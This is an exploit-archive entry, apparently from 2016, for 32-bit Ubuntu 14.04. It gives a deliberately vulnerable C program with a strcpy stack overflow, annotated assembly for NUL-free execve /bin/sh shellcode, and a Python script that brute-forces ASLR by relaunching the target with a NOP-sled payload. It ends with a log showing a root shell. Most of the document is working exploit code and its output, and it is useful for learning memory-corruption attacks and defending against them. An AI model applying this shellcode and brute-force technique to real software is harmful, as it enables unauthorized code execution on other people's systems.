
Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce

27 Jun 2016 00:00:00 — Reported by Pawan Lal

Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce for Ubuntu 14.04 (32-bit).

Code
/bin/sh shellcode for Ubuntu 14.04 (32-bit) + ASLR brute force
 
#shellcodeandaslrbruteforce.c
#Tested on : Ubuntu 14.04 32 bits
#Author : Pawan Lal   [email protected]
 
*vim shellcodeandaslrbruteforce.c*
 
#include    <stdio.h>
#include    <stdlib.h>
#include    <assert.h>
#include    <string.h>
 
 
/*
 * Deliberately vulnerable target.  strcpy() copies arg into a 100-byte
 * stack buffer with no length check, so a longer argv[1] runs past the
 * buffer over the saved EBP and the saved return address (the Python
 * driver below assumes 12 bytes between the end of buffer and the
 * return-address slot).  The overwrite happens on the strcpy line, but
 * control is only hijacked when this function returns, which is why the
 * "[+] buffer @" line is still printed on every attempt in the session
 * log below.  Printing the address of buffer is an information leak that
 * would defeat ASLR outright in a real target; the brute-force driver
 * here does not read it (it never captures stdout) -- it is only there so
 * you can watch the stack move between runs.
 */
void vuln (const char* arg){
    char buffer[100];
    strcpy(buffer, arg);                    /* unbounded copy: this is the overflow */
    printf("Hello %s\n", buffer);
    printf("[+] buffer @ %p\n", buffer);    /* leaks the stack address; unused by the driver */
}
 
/* Entry point.  Exactly one argument is required; it is handed to vuln()
 * untouched (argv[1] is the attacker-controlled payload).  Any other
 * argument count prints usage and exits with status 1. */
int main (int argc, char **argv){
    if (argc == 2) {
        vuln(argv[1]);
        return 0;
    }
    printf("Usage: %s <buffer>\n", argv[0]);
    exit(1);
}
 
Compile with the command below. `-fno-stack-protector` turns off the stack canary and `-z execstack` marks the stack executable; the exploit relies on both, since it overwrites the saved return address and jumps into a NOP sled that lives on the stack.
 
usage : gcc -fno-stack-protector -z execstack shellcodeandaslrbruteforce.c -o shellcodeandaslrbruteforce
 
Turn on ASLR (1 = randomize the stack, mmap and vDSO bases; 2, the Linux default, additionally randomizes the brk heap — the stack address is randomized under both settings, so the brute force below works either way):
 
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
#############################################################
 
*shellcode that executes '/bin/sh'*
 
; execve("/bin//sh", {"/bin//sh", NULL}, {NULL}) for 32-bit Linux.
; Written so the encoding contains no NUL bytes, because the Python driver
; below hands it to the target through argv (a C string): eax is zeroed with
; xor rather than mov, and the syscall number goes into al rather than eax.
; "/bin//sh" is used instead of "/bin/sh" so the path is exactly 8 bytes and
; fits in two 4-byte pushes; the doubled slash is harmless to the kernel.
; The assembled bytes are the `shellcode` string in the Python script below.
global _start

section .text

_start:
    xor eax, eax        ; eax = 0 (no NUL byte in the encoding)
    push eax            ; NUL terminator for the path string

    push 0x68732f2f     ; "//sh" (little-endian: pushed last, ends up after "/bin")
    push 0x6e69622f     ; "/bin"
    mov ebx, esp        ; ebx = pointer to "/bin//sh" (execve arg 1: filename)

    push eax            ; NULL: terminates the argv array and doubles as envp
    mov edx, esp        ; edx = pointer to that NULL (execve arg 3: envp = empty)

    push ebx
    mov ecx, esp        ; ecx = pointer to {"/bin//sh", NULL} (execve arg 2: argv)

    mov al, 11          ; __NR_execve on 32-bit Linux
    int 0x80            ; execve syscall; on success it never returns
 
 
 
################################################################
 
*Final exploit using /bin/sh shellcode and ASLR bruteforce*
 
*vim shellcodeandaslrbruteforce.py*
 
#!/usr/bin/python
 
import struct, sys, time
from subprocess import PIPE, Popen
 
# exec /bin/sh
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
 
bufsize = 100
offset = 12     #incl. saved ebp
nopsize = 4096
 
def prep_buffer(addr_buffer):
    buf = "A" * (bufsize+offset)
    buf += struct.pack("<I",(addr_buffer+bufsize+offset+4))
    buf += "\x90" * nopsize
    buf += shellcode
    return buf
 
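def brute_aslr(buf, target="./shellcodeandaslrbruteforce"):
    """Run the target once with `buf` as argv[1] and return its exit status.

    The child inherits our stdin/stdout, so when the guess is right the
    spawned /bin/sh is interactive and this call blocks until it is closed.
    Popen.wait() reports death by signal as a negative number (-11 for
    SIGSEGV), which is what a wrong guess almost always looks like; a
    non-negative status means the process exited normally, i.e. the
    shellcode ran and the shell was closed.

    `target` defaults to the binary name produced by the gcc command above
    (the original script launched ./bof, which that command does not build).
    The argument list form of Popen means no shell parses the payload.
    """
    return Popen([target, buf]).wait()


if __name__ == '__main__':
    addr_buffer = 0xbf92b39c    # arbitrary starting guess for the address of `buffer`
    buf = prep_buffer(addr_buffer)
    attempt = 0
    while True:
        print(attempt)
        status = brute_aslr(buf)
        # Keep guessing while the child dies from a signal (negative status).
        # A normal exit only happens after the shellcode ran and the shell
        # was closed, so stop instead of spawning endless shells.
        if status >= 0:
            print("[+] shellcode ran after %d attempts (shell exit status %d)"
                  % (attempt + 1, status))
            break
        attempt += 1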
 
##################################################################
 
 
root@ubuntu:~/bof/shellcodeandaslrbruteforce
⇒ python shellcodeandaslrbruteforce.py
(...)
(...)
 
[+] buffer @ 0xbfc2bc0c
996
(... snippet)
 
[+] buffer @ 0xbfb9930c
997
(... snippet)
 
[+] buffer @ 0xbf92721c
998
(... snippet)
 
[+] buffer @ 0xbf92a26c
# whoami
root
(The shell is root only because this session itself runs as root — see the prompt above. The exploit yields the privileges of whoever runs the target binary; it is not a privilege escalation.)
